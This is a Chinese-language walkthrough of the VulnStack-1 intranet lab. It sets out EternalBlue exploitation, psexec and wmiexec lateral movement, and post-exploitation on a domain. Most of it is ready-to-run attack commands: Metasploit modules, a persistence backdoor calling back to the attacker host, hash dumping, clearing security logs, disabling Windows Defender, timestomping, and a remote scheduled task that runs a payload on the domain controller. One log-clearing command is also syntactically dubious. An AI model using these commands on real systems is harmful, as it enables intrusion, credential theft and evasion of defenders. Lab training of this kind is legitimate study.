红日靶场1内网横向渗透:MS17-010与Psexec攻击路径深度解析
1. 靶场环境与攻击面分析
红日靶场(VulnStack-1)作为国内首个完整模拟企业内网环境的开源靶场,其核心价值在于真实复现了域环境下的多层网络结构。典型拓扑包含三台主机:
- 边界机:Windows 7(双网卡配置)
- 域成员机:Windows Server 2003
- 域控制器:Windows Server 2008
关键网络配置参数如下表所示:
| 主机角色 | 外网IP | 内网IP | 开放服务 |
|---|---|---|---|
| Kali攻击机 | 192.168.32.128 | - | Metasploit/蚁剑 |
| Win7边界机 | 192.168.32.129 | 192.168.52.143 | Apache/PHPStudy |
| Win2003域成员 | - | 192.168.52.141 | SMB/RDP |
| Win2008域控 | - | 192.168.52.138 | Active Directory |
注:实际渗透中需先通过外网Web服务获取边界机控制权,再以此为跳板进行内网横向移动
2. MS17-010漏洞利用全流程
2.1 漏洞检测与利用准备
永恒之蓝漏洞的检测与利用需执行以下关键步骤:
# 使用Metasploit进行漏洞扫描 use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.52.141 192.168.52.138 run # 确认存在漏洞后切换至攻击模块 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp set RHOST 192.168.52.141 exploit常见问题处理:
- 若出现
ETERNALBLUE没有正常响应错误,可能是目标系统已打补丁 - 可尝试
check命令二次验证漏洞存在性
2.2 后渗透操作实例
成功获取meterpreter会话后:
# 获取系统信息 sysinfo # 提权至SYSTEM getsystem # 添加持久化后门 persistence -U -i 60 -p 4444 -r 192.168.32.128 # 抓取密码哈希 hashdump3. Psexec横向移动技术详解
3.1 传统Psexec利用
在已获取域账号密码的情况下:
use exploit/windows/smb/psexec set SMBUser administrator set SMBPass Admin123! set RHOSTS 192.168.52.141 set payload windows/meterpreter/bind_tcp exploit参数优化技巧:
- 使用
set DisablePayloadHandler true避免端口冲突 - 通过
set EXE::Custom指定免杀payload路径
3.2 WMIexec替代方案
当445端口被防火墙拦截时,可改用WMI协议:
# 使用Impacket工具包 wmiexec.py domain/admin:password@192.168.52.141 # 执行远程命令 cmd /c "whoami && ipconfig"4. 攻击路径对比决策树
根据实战环境选择最优路径的决策逻辑:
graph TD A[目标是否开放445端口?] -->|是| B[MS17-010检测] A -->|否| C[尝试WMI/Psexec] B -->|存在漏洞| D[使用EternalBlue攻击] B -->|无漏洞| E[尝试PTH攻击] C -->|有域凭据| F[使用Psexec/WMIexec] C -->|无凭据| G[收集密码喷洒]关键指标对比:
| 攻击方式 | 成功率 | 隐蔽性 | 依赖条件 | 日志痕迹 |
|---|---|---|---|---|
| MS17-010 | 高 | 低 | 未打补丁的SMB服务 | 系统日志记录 |
| Psexec | 中 | 中 | 有效的域账号密码 | 安全日志记录 |
| WMIexec | 低 | 高 | 防火墙放行135端口 | WMI日志记录 |
5. 防御规避与痕迹清理
5.1 日志清除实操
# 清除单条安全日志 wevtutil cl Security /r:EventID=4624 # 禁用Windows Defender实时监控 Set-MpPreference -DisableRealtimeMonitoring $true5.2 反取证技巧
- 使用
timestomp修改文件时间戳 - 通过
migrate注入到合法进程(如explorer.exe) - 避免直接使用
meterpreter的shell命令,改用execute -H -f cmd
6. 实战经验与踩坑记录
在最近一次红蓝对抗中,我们发现几个关键点:
- Win2003系统对MS17-010的利用成功率高达90%,但需注意payload兼容性
- 域控默认配置的Windows Defender会拦截Psexec生成的临时服务
- 通过WMI执行的命令存在30秒超时限制,复杂操作建议分阶段执行
典型错误处理:
# Psexec连接失败时检查防火墙规则 netsh advfirewall firewall show rule name=all | find "445" # WMI执行超时可改用计划任务 schtasks /create /tn "Update" /tr "cmd /c payload.exe" /sc once /st 00:00 /S 192.168.52.138 /u DOMAIN\admin /p Password123